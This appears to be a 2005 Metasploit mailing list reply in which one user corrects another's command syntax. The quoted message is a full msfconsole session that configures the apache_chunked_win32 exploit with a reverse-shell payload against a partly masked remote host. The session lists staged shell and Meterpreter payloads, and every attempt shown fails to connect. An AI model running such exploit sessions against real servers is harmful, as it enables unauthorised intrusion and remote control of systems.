Metasploit mailing list archives

re: Apache Exploit : Errors


From: dunceor at gmail.com (Dunceor .)
Date: Wed, 27 Apr 2005 10:03:43 +0200

As HD said before, that is wrong syntax. 
You don't write exploit 80.x.x.x, just exploit there.

Take a good look at:
http://metasploit.com/projects/Framework/docs/userguide.pdf

/ Dunceor

On 4/26/05, Cyril Esedo <cesedo at logiciel-inc.com> wrote:
 

hi HD,

thanks for your prompt reply, i have included the whole snapshot of what i
did to this mail, where did i go wrong?


 

                __.                       .__.        .__. __.
  _____   _____/  |______    ____________ |  |   ____ |__|/  |_
 /     \_/ __ \   __\__  \  /  ___/\____ \|  |  /  _ \|  \   __\
|  Y Y  \  ___/|  |  / __ \_\___ \ |  |_> >  |_(  <_> )  ||  |
|__|_|  /\___  >__| (____  /____  >|   __/|____/\____/|__||__|
      \/     \/          \/     \/ |__| 


+ -- --=[ msfconsole v2.3 [46 exploits - 68 payloads] 

msf > use aqpache_chunked_win32
msfconsole: use: please specify a valid exploit name
msf > use apache_chunked_win32
msf apache_chunked_win32 > show options 

Exploit Options
=============== 

  Exploit:    Name      Default    Description
  --------    ------    -------    ------------------
  optional    SSL                  Use SSL
  required    RHOST                The target address
  required    RPORT     80         The target port 

  Target: Windows NT/2K Bruteforce 

msf apache_chunked_win32 > set RPORT 443
RPORT -> 443
msf apache_chunked_win32 > set RHOST 80.x.x.x
RHOST -> 80.x.x.x
msf apache_chunked_win32 > set SSL 1
SSL -> 1
msf apache_chunked_win32 > show options 

Exploit Options
=============== 

  Exploit:    Name      Default         Description
  --------    ------    ------------    ------------------
  optional    SSL       1               Use SSL
  required    RHOST     80.x.x.x    The target address
  required    RPORT     443             The target port 

  Target: Windows NT/2K Bruteforce 

msf apache_chunked_win32 > show targets 

Supported Exploit Targets
========================= 

   0  Windows NT/2K Bruteforce
   1  Windows 2000
   2  Windows NT 

msf apache_chunked_win32 > set TARGET 2
TARGET -> 2
msf apache_chunked_win32 > show payloads 

Metasploit Framework Usable Payloads
==================================== 

  win32_adduser                Windows Execute net user /ADD
  win32_bind                   Windows Bind Shell
  win32_bind_dllinject         Windows Bind DLL Inject
  win32_bind_meterpreter       Windows Bind Meterpreter DLL Inject
  win32_bind_stg               Windows Staged Bind Shell
  win32_bind_stg_upexec        Windows Staged Bind Upload/Execute
  win32_bind_vncinject         Windows Bind VNC Server DLL Inject
  win32_exec                   Windows Execute Command
  win32_reverse                Windows Reverse Shell
  win32_reverse_dllinject      Windows Reverse DLL Inject
  win32_reverse_meterpreter    Windows Reverse Meterpreter DLL Inject
  win32_reverse_stg            Windows Staged Reverse Shell
  win32_reverse_stg_upexec     Windows Staged Reverse Upload/Execute
  win32_reverse_vncinject      Windows Reverse VNC Server Inject 

msf apache_chunked_win32 > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf apache_chunked_win32(win32_reverse) > show options 

Exploit and Payload Options
=========================== 

  Exploit:    Name      Default         Description
  --------    ------    ------------    ------------------
  optional    SSL       1               Use SSL
  required    RHOST     80.x.x.x   The target address
  required    RPORT     443             The target port 

  Payload:    Name        Default    Description
  --------    --------    -------   
------------------------------------------ 

  required    EXITFUNC    seh        Exit technique: "process", "thread",
"seh"
  required    LHOST                  Local address to receive connection
  required    LPORT       4321       Local port to receive connection 

  Target: Windows NT 

msf apache_chunked_win32(win32_reverse) > set LHOST
192.168.0.123
LHOST -> 192.168.0.123
msf apache_chunked_win32(win32_reverse) > exploit 80.x.x.x
[*] Starting Reverse Handler.
[*] Error creating socket: Connection failed: Operation now in progress
[*] Exiting Reverse Handler. 

msf apache_chunked_win32(win32_reverse) > exploit 80.x.x.x
[*] Starting Reverse Handler.
[*] Error creating socket: Connection failed: Operation now in progress
[*] Exiting Reverse Handler. 

msf apache_chunked_win32(win32_reverse) > exploit 80.x.x.x
[*] Starting Reverse Handler.
[*] Error creating socket: Connection failed: Operation now in progress
[*] Exiting Reverse Handler. 

msf apache_chunked_win32(win32_reverse) >
 

thanks - C






Current thread: